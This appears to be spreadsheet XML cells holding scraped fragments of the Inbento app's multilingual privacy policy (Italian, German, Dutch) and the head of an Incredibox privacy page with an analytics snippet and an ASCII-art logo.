&lt;p&gt;Inbento utilizza i dati raccolti per vari scopi:&lt;/p&gt;
</t>
  </si>
  <si>
    <t>&lt;ul&gt;
&lt;li&gt;Per fornire e mantenere il nostro Servizio&lt;/li&gt;
&lt;li&gt;Per comunicare agli utenti variazioni apportate al servizio che offriamo&lt;/li&gt;
&lt;li&gt;Per permettere agli utenti di fruire, a propria discrezione, di funzioni interattive del nostro servizio&lt;/li&gt;
&lt;li&gt;Per fornire un servizio ai clienti&lt;/li&gt;
&lt;li&gt;Per raccogliere analisi o informazioni preziose in modo da poter migliorare il nostro Servizio&lt;/li&gt;
&lt;li&gt;Per monitorare l'utilizzo del nostro Servizio&lt;/li&gt;
&lt;li&gt;Per rilevare, prevenire e affrontare problemi tecnici&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt; Trasferimento dei dati&lt;/h2&gt;
&lt;p&gt;Le vostre informazioni, compresi i Dati personali, possono essere trasferite a - e mantenute su - computer situati al di fuori del vostro stato, provincia, nazione o altra giurisdizione governativa dove le leggi sulla protezione dei dati possono essere diverse da quelle della vostra giurisdizione.&lt;/p&gt;
&lt;p&gt; Se ci si trova al di fuori di e si sceglie di fornire informazioni a noi, si ricorda che trasferiamo</t>
  </si>
  <si>
    <t>i dati, compresi i dati personali, in e li elaboriamo lì.&lt;/p&gt;
&lt;p&gt; Il vostro consenso alla presente Informativa sulla privacy seguito dall'invio di tali informazioni rappresenta il vostro consenso al trasferimento.&lt;/p&gt;
&lt;p&gt;Inbento adotterà tutte le misure ragionevolmente necessarie per garantire che i vostri dati siano trattati in modo sicuro e in conformità con la presente Informativa sulla privacy e nessun trasferimento dei vostri Dati Personali sarà effettuato a un'organizzazione o a un paese a meno che non vi siano controlli adeguati dei vostri dati e altre informazioni personali.&lt;/p&gt;
&lt;h2&gt;Divulgazione di dati&lt;/h2&gt;
&lt;h3&gt;</t>
  </si>
  <si>
    <t>Prescrizioni di legge&lt;/h3&gt;
&lt;p&gt;Inbento può divulgare i vostri Dati personali in buona fede, ritenendo che tale azione sia necessaria per:&lt;/p&gt;
 &lt;ul&gt;
&lt;li&gt;Rispettare un obbligo legale&lt;/li&gt;
&lt;li&gt;Proteggere e difendere i diritti o la proprietà di Inbento&lt;/li&gt;
&lt;li&gt;Prevenire o investigare possibili illeciti in relazione al Servizio&lt;/li&gt;
&lt;li&gt;Proteggere la sicurezza personale degli utenti del Servizio o del pubblico&lt;/li&gt;
&lt;li&gt;Proteggere contro la responsabilità legale&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt; Sicurezza dei dati&lt;/h2&gt;
&lt;p&gt;La sicurezza dei vostri dati è importante per noi, ma ricordate che nessun metodo di trasmissione su Internet o metodo di archiviazione elettronica è sicuro al 100%.</t>
  </si>
  <si>
    <t>Pertanto, anche se adotteremo ogni mezzo commercialmente accettabile per proteggere i vostri Dati personali, non possiamo garantirne la sicurezza assoluta.&lt;/p&gt;
&lt;h2&gt; Fornitori di servizi&lt;/h2&gt;
&lt;p&gt;Potremmo impiegare società e individui di terze parti per facilitare il nostro Servizio (&amp;quot;Fornitori di servizi&amp;quot;), per fornire il Servizio per nostro conto, per eseguire servizi relativi ai Servizi o per aiutarci ad analizzare come viene utilizzato il nostro Servizio.&lt;/p&gt;
&lt;p&gt; Le terze parti hanno accesso ai vostri Dati personali solo per eseguire queste attività per nostro conto e sono obbligate a non rivelarle o utilizzarle per altri scopi.&lt;/p&gt;
&lt;h2&gt;Link ad altri siti&lt;/h2&gt;
&lt;p&gt;OIl nostro servizio può contenere collegamenti ad altri siti non gestiti da noi.</t>
  </si>
  <si>
    <t>Cliccando su un link di terze parti, sarete indirizzati al sito di quella terza parte. Ti consigliamo vivamente di rivedere l'Informativa sulla privacy di ogni sito che visiti.&lt;/p&gt;
&lt;p&gt;Non abbiamo alcun controllo e non ci assumiamo alcuna responsabilità per il contenuto, le politiche sulla privacy o le pratiche di qualsiasi sito o servizio di terzi.&lt;/p&gt;
&lt;h2&gt; Privacy dei minori&lt;/h2&gt;
&lt;p&gt;</t>
  </si>
  <si>
    <t>Il nostro servizio non si rivolge a minori di 18 anni (&amp;quot;Bambini&amp;quot;).&lt;/p&gt;
&lt;p&gt;Non raccogliamo consapevolmente informazioni personali relative a utenti di età inferiore a 18 anni. Se siete un genitore o tutore e siete consapevoli che vostro figlio ci ha fornito Dati personali, vi preghiamo di contattarci. Se veniamo a conoscenza del fatto che abbiamo raccolto Dati personali da minori senza la verifica del consenso dei genitori, adotteremo provvedimenti per rimuovere tali informazioni dai nostri server.&lt;/p&gt;
&lt;h2&gt;Modifiche alla presente informativa sulla privacy&lt;/h2&gt;
&lt;p&gt;Potremmo aggiornare periodicamente la nostra Informativa sulla privacy.</t>
  </si>
  <si>
    <t>Ti informeremo di eventuali modifiche pubblicando la nuova Informativa sulla privacy in questa pagina.&lt;/p&gt;
&lt;p&gt;Vi informeremo via e-mail e / o un avviso di rilievo sul nostro Servizio, prima che la modifica diventi effettiva e aggiorneremo la &amp;quot;data di validità&amp;quot; nella parte superiore di questa Informativa sulla privacy.&lt;/p&gt;
&lt;p&gt;Si consiglia di rivedere periodicamente la presente Informativa sulla privacy per eventuali modifiche. Le modifiche a tale informativa sulla privacy entrano in vigore nel momento in cui vengono pubblicate su questa pagina.&lt;/p&gt;
&lt;h2&gt;Contattaci&lt;/h2&gt;
&lt;p&gt; In caso di domande sulla presente Informativa sulla privacy, si prega di contattarci:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Tramite e-mail: &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="8fe6e1edeae1fbe0cfeee9fbeafdedfafde1a1e8eee2eafc"&gt;[email&amp;#160;protected]&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="tab-content translations-content-item de hidden" id="de"&gt;
&lt;h1&gt;Datenschutz-Richtlinie&lt;/h1&gt;
&lt;p&gt;Datum des Inkrafttretens: July 01, 2019&lt;/p&gt;
&lt;p&gt;Inbento (&amp;quot;wir&amp;quot;, &amp;quot;uns&amp;quot;, &amp;quot;unser&amp;quot; usw.)</t>
  </si>
  <si>
    <t>betreibt die mobile App Inbento (nachstehend als &amp;quot;Dienst&amp;quot; bezeichnet).&lt;/p&gt;
&lt;p&gt;Diese Seite enthält Informationen zu der Art und Weise, auf welche wir personenbezogene Daten erfassen, nutzen und offenlegen, wenn Sie unseren Dienst nutzen, sowie zu den Optionen, die Ihnen im Zusammenhang mit diesen Daten zur Verfügung stehen.</t>
  </si>
  <si>
    <t>Diese Datenschutzrichtlinie wird von &lt;a href="https://www.freeprivacypolicy.com/free-privacy-policy-generator/" target="_blank"&gt;Privacy Policy Generator&lt;/a&gt; verwaltet.&lt;/p&gt;
&lt;p&gt;Wir nutzen Ihre Daten zur Bereitstellung und Verbesserung unseres Dienstes. Durch Inanspruchnahme des Dienstes erklären Sie sich mit der Erfassung und Nutzung von Daten durch uns nach Maßgabe dieser Richtlinie einverstanden. Soweit in dieser Datenschutz-Richtlinie nicht jeweils etwas anderes angegeben ist, kommt den in dieser Datenschutz-Richtlinie vorkommenden Begriffen jeweils dieselbe Bedeutung zu, die diesen in unseren Allgemeinen Geschäftsbedingungen (Terms and Conditions)</t>
  </si>
  <si>
    <t>zugewiesen wurde.&lt;/p&gt;
&lt;h2&gt;Begriffsbestimmungen&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Dienst&lt;/strong&gt;
 Der Dienst ist die von dem Inbento betriebene mobile App Inbento&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Personenbezogene Daten&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Personenbezogene Daten sind Daten, die sich auf eine lebende Person beziehen, welche anhand dieser Daten (bzw. anhand dieser Daten in Kombination mit weiteren Informationen, die sich bereits in unserem Besitz befinden oder mit Wahrscheinlichkeit in unseren Besitz gelangen werden) identifizierbar ist.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Nutzungsdaten&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Nutzungsdaten sind Daten, die automatisch im Rahmen der Nutzung des Dienstes oder innerhalb der Dienstinfrastruktur selbst (beispielsweise für die Dauer eines Seitenbesuchs) erfasst werden.&lt;/p&gt;
 &lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Cookies&lt;/strong&gt;
Cookies sind kleine Dateien, die auf Ihrem Gerät (Computer oder mobiles Endgerät) gespeichert werden.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Erfassung und Nutzung von Daten&lt;/h2&gt;
&lt;p&gt;Wir erfassen verschiedene Arten von Daten für eine Reihe von Zwecken, um den Dienst, den wir Ihnen zur Verfügung stellen, zu verbessern.&lt;/p&gt;
&lt;h3&gt;Arten der erfassten Daten&lt;/h3&gt;
&lt;h4&gt;Personenbezogene Daten&lt;/h4&gt;
&lt;p&gt;Im Rahmen der Nutzung unseres Dienstes bitten wir Sie gegebenenfalls um die Zurverfügungstellung bestimmter persönlich identifizierbarer Daten, die wir dazu nutzen, um Sie zu kontaktieren oder zu identifizieren (&amp;quot;personenbezogene Daten&amp;quot;).</t>
  </si>
  <si>
    <t>Analyse unseres Dienstes.&lt;/p&gt;
&lt;p&gt;Sie können in den Einstellungen Ihres Browsers bestimmen, ob Sie alle Cookies ablehnen oder nur bestimmte Cookies akzeptieren möchten. Falls Sie jedoch die Annahme von Cookies verweigern, können Sie gegebenenfalls Teile unseres Dienstes nicht in Anspruch nehmen.&lt;/p&gt;
&lt;p&gt; Beispiele für von uns eingesetzte Cookies:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Sitzungs-Cookies.&lt;/strong&gt; Wir setzen Sitzungs-Cookies für den Betrieb unseres Dienstes ein.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Präferenz-Cookies.&lt;/strong&gt; Wir setzen Präferenz-Cookies ein, um Ihre Präferenzen und verschiedenen Einstellungen zu speichern.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Sicherheits-Cookies.&lt;/strong&gt; Wir setzen Sicherheits-Cookies für Sicherheitszwecke ein.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Datennutzung&lt;/h2&gt;
&lt;p&gt;Wir bei Inbento nutzen die erfassten Daten für verschiedene Zwecke, beispielsweise um:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Ihnen unseren Dienst zur Verfügung zu stellen und diesen aufrecht zu erhalten;&lt;/li&gt;
&lt;li&gt;Ihnen Änderungen in Bezug auf unseren Dienst mitzuteilen;&lt;/li&gt;
&lt;li&gt;es Ihnen auf Wunsch zu ermöglichen, an den interaktiven Teilen unseres Dienstes teilzunehmen;&lt;/li&gt;
&lt;li&gt;Kundendienstleistungen zur Verfügung zu stellen;&lt;/li&gt;
&lt;li&gt;Analysedaten und sonstige wertvolle Daten zu erfassen, damit wir unseren Dienst verbessern können;&lt;/li&gt;
&lt;li&gt;die Nutzung unseres Dienstes zu überwachen;&lt;/li&gt;
&lt;li&gt;technische Probleme zu erkennen, zu vermeiden und zu beheben;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Übertragung von Daten&lt;/h2&gt;
&lt;p&gt;Ihre Daten, einschließlich personenbezogener Daten, können auf Computer übertragen – und auf solchen aufbewahrt – werden, die sich außerhalb Ihres Heimatstaates, Ihrer Heimatprovinz, Ihres Heimatlandes oder einer sonstigen Rechtsordnung befinden und somit Datenschutzgesetzen unterliegen, die sich von den Datenschutzgesetzen in Ihrer Rechtsordnung unterscheiden.&lt;/p&gt;
&lt;p&gt;Falls Sie sich außerhalb von befinden und sich dazu entscheiden, Daten an uns zu übermitteln, müssen Sie zur Kenntnis nehmen, dass wir Ihre Daten, einschließlich personenbezogener Daten, nach übertragen und diese dort verarbeiten.&lt;/p&gt;
&lt;p&gt;Ihre Zustimmung zu dieser</t>
  </si>
  <si>
    <t>Datenschutz-Richtlinie und eine nachfolgende Übermittlung von Daten Ihrerseits stellt eine Einverständniserklärung Ihrerseits zu der genannten Übertragung dar.&lt;/p&gt;
&lt;p&gt;Inbento wird alle im zumutbaren</t>
  </si>
  <si>
    <t>Rahmen erforderlichen Schritte unternehmen um sicherzustellen, dass Ihre Daten auf sichere Weise sowie in Übereinstimmung mit dieser Datenschutz-Richtlinie behandelt werden, und dass Ihre personenbezogenen Daten nicht an Organisationen oder in Länder übertragen werden, hinsichtlich welcher keine hinreichenden Kontrollmechanismen in Bezug auf die Sicherheit Ihrer Daten und sonstigen personenbezogenen Informationen vorliegen.&lt;/p&gt;
&lt;h2&gt;Offenlegung von Daten&lt;/h2&gt;
&lt;h3&gt;Gesetzliche Anforderungen&lt;/h3&gt;
&lt;p&gt;Inbento kann Ihre personenbezogenen Daten unter Umständen offenlegen, wenn es unter Beachtung der Grundsätze von Treu und Glauben der Ansicht ist, dass dies zur Erreichung der nachfolgenden Zielsetzungen erforderlich ist:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;zur Erfüllung einer gesetzlichen Pflicht&lt;/li&gt;
&lt;li&gt;zum Schutz und zur Verteidigung der Rechte oder des Eigentums von Inbento&lt;/li&gt;
&lt;li&gt;zur Vermeidung oder Untersuchung möglicher Fehlverhaltensweisen in Bezug auf den Dienst&lt;/li&gt;
&lt;li&gt;zum Schutz der persönlichen Sicherheit der Nutzer des Dienstes oder der Öffentlichkeit&lt;/li&gt;
&lt;li&gt;zur Vermeidung von Haftungsansprüchen&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Datensicherheit&lt;/h2&gt;
&lt;p&gt;Die Sicherheit Ihrer Daten ist uns wichtig. Bitte vergessen Sie jedoch nicht, dass es keine Übertragungsmethoden über das Internet und keine elektronischen Speichermedien gibt, die 100 % sicher sind.</t>
  </si>
  <si>
    <t>Obwohl wir stets bemüht sind, kommerziell annehmbare Maßnahmen zum Schutz Ihrer personenbezogenen Daten umzusetzen, können wir eine absolute Sicherheit nicht garantieren.&lt;/p&gt;
&lt;h2&gt;Leistungsanbieter&lt;/h2&gt;
&lt;p&gt;Wir beauftragen gegebenenfalls dritte Unternehmen und Einzelpersonen (&amp;quot;Leistungsanbieter&amp;quot;) mit Unterstützungsleistungen zum einfacheren Angebot unseres Dienstes, mit der Erbringung von Leistungen in unserem Namen, mit der Erbringung von mit unserem Dienst verbundenen Leistungen oder mit Unterstützungsleistungen zur Analyse der Art und Weise, auf die unser Dienst in Anspruch genommen wird.&lt;/p&gt;
&lt;p&gt;Diese Dritten können auf Ihre personenbezogenen Daten nur in dem Umfang Zugriff nehmen, der für die Erfüllung der genannten Aufgaben in unserem Namen erforderlich ist, und dürfen diese für keine sonstigen Zwecke offenlegen oder nutzen.&lt;/p&gt;
&lt;h2&gt;Links zu anderen Websites&lt;/h2&gt;
&lt;p&gt;Unser Dienst kann Links zu anderen Websites enthalten, die nicht von uns betrieben werden. Wenn Sie auf einen Drittlink klicken, werden Sie direkt auf die Website des betreffenden Dritten weitergeleitet.</t>
  </si>
  <si>
    <t>Wir empfehlen Ihnen dringend, sich jeweils die Datenschutz-Richtlinien aller von Ihnen besuchten Websites durchzulesen.&lt;/p&gt;
&lt;p&gt;Wir haben keine Kontrolle über die Inhalte, Datenschutzvorschriften und -praktiken dritter Websites oder Dienste und übernehmen in diesem Zusammenhang keine Haftung.&lt;/p&gt;
&lt;h2&gt; Privatsphäre Minderjähriger&lt;/h2&gt;
&lt;p&gt;Unser Dienst richtet sich nicht an Personen, die das 18. Lebensjahr noch nicht vollendet haben (&amp;quot;minderjährige Personen&amp;quot;).&lt;/p&gt;
&lt;p&gt;Wir erfassen wissentlich keine persönlich identifizierbaren Daten zu minderjährigen Personen.</t>
  </si>
  <si>
    <t>Falls Sie ein Elternteil oder Vormund sind und es Ihnen bekannt wird, dass eine Ihrer Aufsicht unterstehende minderjährige Person uns personenbezogene Daten übermittelt hat, bitten wir Sie, mit uns Kontakt aufzunehmen. Falls uns bekannt wird, dass wir personenbezogene Daten einer minderjährigen Person ohne elterliche</t>
  </si>
  <si>
    <t>Zustimmung erfasst haben, setzen wir Maßnahmen zur Entfernung dieser Daten von unseren Servern um.&lt;/p&gt;
&lt;h2&gt;Änderungen dieser Datenschutz-Richtlinie&lt;/h2&gt;
&lt;p&gt;Wir können unsere Datenschutz-Richtlinie von Zeit zu Zeit aktualisieren. Jegliche solcher Änderungen teilen wir Ihnen mit, indem wir die aktualisierte Fassung auf dieser Seite veröffentlichen.&lt;/p&gt;
&lt;p&gt;Wir werden Sie vor dem Inkrafttreten der betreffenden Änderung per E-Mail und/oder mittels einer sonstigen sichtbaren Mitteilung innerhalb unseres Dienstes informieren und das &amp;quot;Datum des Inkrafttretens&amp;quot; am Beginn dieser Datenschutz-Richtlinie aktualisieren.&lt;/p&gt;
&lt;p&gt;Wir empfehlen Ihnen, diese Datenschutz-Richtlinie regelmäßig auf Änderungen hin durchzusehen. Änderungen dieser Datenschutz-Richtlinie werden im Zeitpunkt ihrer Veröffentlichung auf dieser Seite wirksam.&lt;/p&gt;
&lt;h2&gt;Kontaktaufnahme&lt;/h2&gt;
&lt;p&gt;Falls Sie Fragen zu dieser Datenschutz-Richtlinie haben, können Sie wie folgt Kontakt zu uns aufnehmen:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Per E-Mail: &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="3d54535f585349527d5c5b49584f5f484f53135a5c50584e"&gt;[email&amp;#160;protected]&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div class="tab-content translations-content-item nl hidden" id="nl"&gt;
&lt;h1&gt;Privacybeleid&lt;/h1&gt;
&lt;p&gt;Ingangsdatum:</t>
  </si>
  <si>
    <t>July 01, 2019&lt;/p&gt;
&lt;p&gt;Inbento (&amp;quot;ons&amp;quot;, &amp;quot;wij&amp;quot; of &amp;quot;onze&amp;quot;) beheert de Inbento mobiele App (&amp;quot;hierna genoemd Dienst&amp;quot;).&lt;/p&gt;
&lt;p&gt;Deze pagina bevat informatie over ons beleid met betrekking tot de verzameling, het gebruik en de openbaarmaking van uw persoonsgegevens wanneer u onze Dienst gebruikt en de keuzes die u hebt met betrekking tot die gegevens. Dit privacybeleid wordt beheerd door &lt;a href="https://www.freeprivacypolicy.com/free-privacy-policy-generator/" target="_blank"&gt;Privacy Policy Generator&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt; Wij</t>
  </si>
  <si>
    <t>gebruiken uw gegevens om de Dienst te leveren en te verbeteren. Wanneer u de Dienst gebruikt, gaat u akkoord met de verzameling en het gebruik van informatie in overeenstemming met dit beleid. Tenzij anders bepaald in dit Privacybeleid heeft de terminologie die wordt gebruikt in dit Privacybeleid dezelfde betekenis als in onze Algemene voorwaarden.&lt;/p&gt;
&lt;h2&gt;Definities&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Dienst&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Onder dienst verstaan wij de Inbento mobiele App beheerd door Inbento&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Gebruiksgegevens&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Onder gebruiksgegevens verstaan wij automatisch verzamelde gegevens die worden gegenereerd door het gebruik van de Dienst of van de infrastructuur van de Dienst zelf (bijvoorbeeld, de duur van het bezoek aan een pagina).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Gebruiksgegevens&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Onder gebruiksgegevens verstaan wij automatisch verzamelde gegevens die worden gegenereerd door het gebruik van de Dienst of van de infrastructuur van de Dienst zelf (bijvoorbeeld, de duur van het bezoek aan een pagina).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Cookies&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Cookies zijn informatiebestandjes die worden opgeslagen op uw apparaat (computer of mobiele apparaat).&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;</t>
  </si>
  <si>
    <t>Gegevensverzameling en gebruik&lt;/h2&gt;
&lt;p&gt;Wij verzamelen verschillende soorten gegevens voor uiteenlopende doeleinden om onze Dienst aan u te kunnen leveren en om hem te verbeteren.&lt;/p&gt;
&lt;h3&gt;Soorten gegevens die worden verzameld&lt;/h3&gt;
&lt;h4&gt;Persoonsgegevens&lt;/h4&gt;
&lt;p&gt;Wanneer u onze Dienst gebruikt, kunnen wij u vragen ons bepaalde persoonlijk identificeerbare informatie te verstrekken die kan worden gebruikt om contact op te nemen met u of om u te identificeren (&amp;quot;Persoonsgegevens&amp;quot;). Deze persoonlijk identificeerbare informatie kan omvatten maar is niet beperkt tot:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Cookies en Gebruiksgegevens&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;Gebruiksgegevens&lt;/h4&gt;
&lt;p&gt;Wanneer u toegang krijgt tot de Dienst met of via een mobiele apparaat kunnen wij bepaalde gegevens automatisch verzamelen, inclusief, maar niet beperkt tot, het mobiele apparaat dat u gebruikt, de unieke ID van uw mobiele apparaat, het IP-adres van uw mobiele apparaat, uw mobiel besturingss</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;!DOCTYPE html&gt;&lt;html lang='en'&gt;&lt;head&gt;&lt;meta charset='UTF-8'&gt; &lt;script async src='https://www.googletagmanager.com/gtag/js?id=UA-10301455-3'&gt;&lt;/script&gt;&lt;script&gt;window.dataLayer = window.dataLayer || []; function gtag(){ dataLayer.push(arguments); } gtag('js', new Date()); gtag('config', 'UA-10301455-3'); function saveGA(action, label, category){ gtag('event', action, { 'event_category': category, 'event_label': label }); }&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;title&gt;Privacy - Incredibox&lt;/title&gt;&lt;meta name='viewport' content='width=device-width,height=device-height,initial-scale=1,minimum-scale=1,viewport-fit=cover,user-scalable=0'&gt;&lt;meta name='description' content='Incredibox privacy&amp;#39;s policies'&gt;&lt;meta name='author' content='So Far So Good'&gt; 
                &lt;!--   + +</t>
  </si>
  <si>
    <t>+ + + +</t>
  </si>
  <si>
    <t>+ + +</t>
  </si>
  <si>
    <t>+ + + +  INCREDIBOX powered by SO FAR SO GOOD   +</t>
  </si>
  <si>
    <t>+ + +
                + +</t>
  </si>
  <si>
    <t xml:space="preserve">+ + + +   </t>
  </si>
  <si>
    <t>© So Far So Good 2021    +</t>
  </si>
  <si>
    <t>+ + + + +
                +</t>
  </si>
  <si>
    <t xml:space="preserve">+ + + +   http://www.sofarsogood.fr   </t>
  </si>
  <si>
    <t>+ + + + +
                                                            DMMMMMMMMMMMMMMMMMMMMM~  .                        
                                                      .</t>
  </si>
  <si>
    <t xml:space="preserve">8MMMMMMMMMMMMMMMMMMMMMMMMMMMMMM,                      
                                                  . .DMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM$                   
                                                  .MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMD                 
                                                  NMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM~               
                                               :MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM.             
                                              </t>
  </si>
  <si>
    <t xml:space="preserve">MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM             
                                             MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM .          
                                             MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM           
                                         . MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM .        
                                         </t>
  </si>
  <si>
    <t xml:space="preserve">.7MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM          
                                          MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM.        
                                         .MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM7        
                                         .MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM        
                                       </t>
  </si>
  <si>
    <t>.MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM        
                                      .. MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM~.      
                                       .MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMN     MMMMMMMMM       
                                      .ZMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM</t>
  </si>
  <si>
    <t>MMMMMMMMMM           MMMMMMMMM       
                                      .MMMMMMMMMMMMMMMMMMMMMMMMMMMN     MMMMMMMD .             .MMMMMMMMM       
                                       MMMMMMMMMMMMMMMMMMMMMMMM7   ...MMMM? .</t>
  </si>
  <si>
    <t>.  .            .MMMMMMMMM,      
                                      .MMMMMMMMMMMMMMMMMMMN.. .      . . .                     MMMMMMMMMM      
                                    .</t>
  </si>
  <si>
    <t xml:space="preserve">DMMMMMMMMMMMMMD..                     .    ...    .       MMMMMMMMMM      
                                    :MMMMMMMMMMM=          . .   </t>
  </si>
  <si>
    <t xml:space="preserve">. .       $MMMMMMMMMMMMM~.    MMMMMMMMMMD     
                                   8MMMMMMMMMMMM            ,+ODNDZI      NMMMMMMMMMNNMMMMMMN MMMMMMMMMMM     
                                .,MMD,MMMMMMMMMM       ZMMMMMMMMMMMM      MM?.   ....         </t>
  </si>
  <si>
    <t xml:space="preserve">.MMMMMMMMMMM$    
                                      .MMMMMMMMMM.    ,MMMMMMMMMMD=OMM          :MMMMMMMD  .    </t>
  </si>
  <si>
    <t>MMMMMMMMMMMM.   
                                      .MMMMMM MMMMMMMO~M7 ..   .</t>
  </si>
  <si>
    <t>DM..        MM.  . ..   DM.     MMM DMMMMMMMO   
                                    .OMMMMM:</t>
  </si>
  <si>
    <t xml:space="preserve">.MM ...M$.       .    M:      .M .        . .M?   </t>
  </si>
  <si>
    <t xml:space="preserve">MM...MMMMMMMM~  
                                    .MMMMMM= NMM   MN.            ..M      M.             .M  .MMZ  </t>
  </si>
  <si>
    <t xml:space="preserve">MMMM ? MMM  
                                   .. MMMMMMM .?M.  </t>
  </si>
  <si>
    <t xml:space="preserve">M . .      ...    N. . 7,    .  .   </t>
  </si>
  <si>
    <t>..  :D   MN..OMMMM  .DMN.
                                     MMMMMMMM 8 M.  MMMMMMMMMMMMMMMMMM .</t>
  </si>
  <si>
    <t>.MMMMMMMMMMMMMMMMMMM   M:7 MMMMM+  ....
                                   :MMMMMMMMO.</t>
  </si>
  <si>
    <t xml:space="preserve">MI. MI..?MMMMMMM .. 7MM .. MM.  </t>
  </si>
  <si>
    <t xml:space="preserve">NMMMMMMM... 8M. .M  :MMMMMM      
                                .. =MMMMMMMMMM  ~M  OM.  </t>
  </si>
  <si>
    <t>ZMMMMM    M8M=   NMN. .MMMMMM.. +M   MDI.MMMMMMM.     
                                ..</t>
  </si>
  <si>
    <t>MMMMMMMMMMMD.,MZ .OM . ....   .MD MO .</t>
  </si>
  <si>
    <t xml:space="preserve">DDMZ  .     .   ,MZ   M$ ?MMMMMMM      
                                :MMMMMMMMMMMMMM MM    MM?.    </t>
  </si>
  <si>
    <t>? MM.   MM  .M?.DMM..  .</t>
  </si>
  <si>
    <t>OMM.... IM.8MMMMMMMM.     
                               .MMMM, MMMMMMMMMMMNM?   ..</t>
  </si>
  <si>
    <t xml:space="preserve">8MMMD...  .$M.. M. .. ?MMMMD .      MMMMMMMMMMMM..    
                                  </t>
  </si>
  <si>
    <t xml:space="preserve">.IMMMMMMMMMMMMMMM                 :M   M                 MMMMMMMMMMMMM.     
                                 ,MMMMMMMMMMMMMMMMM                ..M. .M.                MMMMMMMMMMMMM      
                               ? MMMMMM7  +MMMMMMMMM                . M   M                .MMMMMMMMMMMM?      
                                          </t>
  </si>
  <si>
    <t xml:space="preserve">MMMMMMMMM                  M   M                ZMMMMMMMMMMMM.      
                                           MMMMMMMMM                  M   M               .MMMMMMMMMMMMM       
                                          .+MMMMMMMM                 </t>
  </si>
  <si>
    <t xml:space="preserve">.M    M               .MMMMMMMMMMMM        
                                           MMMMMMMM                OZM...M.               MMMMMMMMMMMM..      
                                            $MMMMMMM .              </t>
  </si>
  <si>
    <t xml:space="preserve">M M  .MN                MMMMMMMMMMM         
                                           .MMMMMMM,.               I7M. .MM               MMMMMMMMMM .        
                                             </t>
  </si>
  <si>
    <t>MMMMMMM .   ,NMMMMMMMMMMM:  MMMMM8          8MMMMMMMMM=          
                                             ,MMMMMMMMMMN, .       . MZ.. M. ..</t>
  </si>
  <si>
    <t>$MMM:  . .. MMMMMMM MM.          
                                              DMMMMMM8MMMMMM8+       .M</t>
  </si>
  <si>
    <t xml:space="preserve">.N.  ..   +MMM=..MMMMMMM8 M..          
                                                M?MMMM..     :DMMMMMMDM. N8MMMMMMMMMMMMMMMM.MM....            
                                                    </t>
  </si>
  <si>
    <t xml:space="preserve">MMMN            ?MMMMMM8.   . .   .MMMD.~Z .               
                                                       ~MM                          </t>
  </si>
